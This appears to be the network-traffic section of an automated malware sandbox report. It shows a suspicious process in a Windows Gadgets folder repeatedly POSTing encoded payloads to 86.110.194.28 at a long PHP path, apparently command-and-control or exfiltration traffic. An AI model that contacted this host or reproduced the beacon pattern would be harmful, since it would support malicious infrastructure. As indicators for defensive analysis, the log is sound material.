                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.254323006 CET2052OUTData Raw: 5b 50 5e 5f 58 5b 50 5c 54 5b 59 5a 5b 51 57 58 5f 55 5a 5d 52 53 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P^_X[P\T[YZ[QWX_UZ]RSPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(#*8U$?/(;3',) $:4+<%:80?#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:27.601090908 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.733854055 CET324INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 5d 26 3b 29 01 3d 2f 3f 1d 31 0d 08 01 35 0e 28 5c 2c 1e 08 40 21 2c 04 01 27 2b 28 13 3f 3e 35 1a 2b 33 03 51 20 58 22 0b 3f 1a 28 5d 03 10 39 13 28 3e 3f 10 3e 00 35 16 39 34 33 14 27 0e 23 02 29 0a 25 13 32 3c 08 1e 36 5b 2f 1f 3e 1d 2d 5b 33 02 3f 07 3f 0e 3f 5e 27 3d 20 54 0b 17 27 56 27 30 3c 03 27 28 0b 12 3d 0e 2b 02 24 3a 3e 0b 21 3f 2e 19 20 07 38 17 2f 0e 35 1c 30 38 0f 1c 29 2d 3f 57 26 3a 31 00 27 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $]&;)=/?15(\,@!,'+(?>5+3Q X"?(]9(>?>5943'#)%2<6[/>-[3???^'= T'V'0<'(=+$:>!?. 8/508)-?W&:1'.\#(U4WP
                                                                                                                                                                  Jan 3, 2025 09:07:27.764513016 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.981473923 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:27.981695890 CET2576OUTData Raw: 5b 50 5b 5b 5d 5c 50 5a 54 5b 59 5a 5b 55 57 53 5f 55 5a 58 52 57 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[]\PZT[YZ[UWS_UZXRWPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(."5$<)*Y042:5:4; [%)C'/<U?#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:07:28.203341961 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.44974686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:28.718630075 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:29.066829920 CET2576OUTData Raw: 5b 52 5e 50 5d 5c 50 50 54 5b 59 5a 5b 53 57 5d 5f 5d 5a 55 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^P]\PPT[YZ[SW]_]ZURRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+.]#:,R%>6_3',65$!W ^/0$0?$?9#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:29.392749071 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:29.522155046 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:29 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.44974886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:31.761706114 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:32.113632917 CET2576OUTData Raw: 5b 57 5b 5c 58 59 50 58 54 5b 59 5a 5b 52 57 58 5f 53 5a 55 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W[\XYPXT[YZ[RWX_SZUR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>%6:<1<D);6'7!\&!) ?$:#&/<)#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:32.486134052 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:32.619014978 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:32 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  9192.168.2.44975086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:32.743386984 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:33.097990036 CET2576OUTData Raw: 5e 55 5b 5c 58 5c 55 5c 54 5b 59 5a 5b 51 57 5e 5f 55 5a 5e 52 55 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[\X\U\T[YZ[QW^_UZ^RUP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+=[#:0U2?'*;>$B5%5V"%Q78'3:'0<3+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:33.442147970 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:33.571764946 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  10192.168.2.44975186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:32.747220039 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2052
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:33.098078966 CET2052OUTData Raw: 5b 54 5e 5e 5d 5e 50 5a 54 5b 59 5a 5b 50 57 58 5f 57 5a 5d 52 55 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^^]^PZT[YZ[PWX_WZ]RUPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<1!$T&B=%$%2,)Q!"7(]$)3/3?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:33.429280996 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:33.558135033 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 59 31 05 2a 13 29 2c 3f 5f 32 20 2d 58 35 30 2b 04 2f 0e 2d 18 23 3c 3d 5f 26 15 33 0d 2b 04 2d 1a 28 1d 2a 08 23 3e 03 10 2b 0a 28 5d 03 10 39 5c 3c 03 01 5a 3e 10 35 15 39 24 3f 14 24 24 2b 05 3e 33 31 56 25 05 25 0c 21 04 2c 0d 3d 0a 3e 02 30 02 38 19 3c 0e 23 5f 24 3d 20 54 0b 17 27 1d 24 0e 27 5b 31 01 25 58 2a 19 15 00 33 04 29 19 22 5a 2d 09 37 3a 34 18 2c 20 0b 56 24 38 00 0d 29 10 3c 0a 26 29 36 1e 26 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $Y1*),?_2 -X50+/-#<=_&3+-(*#>+(]9\<Z>59$?$$+>31V%%!,=>08<#_$= T'$'[1%X*3)"Z-7:4, V$8)<&)6&;.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  11192.168.2.44975286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:33.739917994 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:34.098109007 CET2568OUTData Raw: 5b 54 5e 5e 58 5a 50 5f 54 5b 59 5a 5b 57 57 5d 5f 56 5a 5f 52 5c 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^^XZP_T[YZ[WW]_VZ_R\P@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@).=\5018>%'4.&"':4;4]'9 D'<$+#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:34.451946020 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:34.586316109 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:34 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  12192.168.2.44975386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:34.717034101 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:35.066730976 CET2576OUTData Raw: 5e 56 5e 50 5d 5d 50 59 54 5b 59 5a 5b 52 57 5a 5f 53 5a 54 52 55 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^P]]PYT[YZ[RWZ_SZTRUPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D?=)5%<A);"3$&6!478$_+&<0S(#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:35.427675009 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:35.566337109 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:35 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  13192.168.2.44975486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:35.760931969 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:36.116731882 CET2576OUTData Raw: 5b 51 5b 5b 58 5a 55 5d 54 5b 59 5a 5b 53 57 5e 5f 51 5a 59 52 51 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q[[XZU]T[YZ[SW^_QZYRQPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<==["#%,#((>Y$]&"7& ;(Z%)+$<)#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:36.481214046 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:36.619604111 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:36 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  14192.168.2.44975586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:36.805354118 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:37.160736084 CET2576OUTData Raw: 5e 55 5b 5c 58 57 50 58 54 5b 59 5a 5b 56 57 5f 5f 5c 5a 5d 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^U[\XWPXT[YZ[VW__\Z]R]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?=Z":R%?,D>;$4%1<95$!Q 0%9 D0<3+#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:37.511320114 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:37.642385960 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:37 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  15192.168.2.44975686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:37.812547922 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2568
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:38.160489082 CET2568OUTData Raw: 5b 56 5e 5d 58 59 55 58 54 5b 59 5a 5b 57 57 5f 5f 5d 5a 58 52 51 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^]XYUXT[YZ[WW__]ZXRQPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+%^6:(V1,*;.$4.11P 7)#':$D0 W+)#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:07:38.490452051 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  16192.168.2.44975786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:38.573647022 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2060
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:38.928361893 CET2060OUTData Raw: 5e 50 5e 59 58 5a 55 5b 54 5b 59 5a 5b 54 57 5f 5f 57 5a 5a 52 51 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P^YXZU[T[YZ[TW__WZZRQPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&+>6/$<$@)'B)Y1?!5'%P7;+$)B3$<9#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:07:39.278163910 CET25INHTTP/1.1 100 Continue
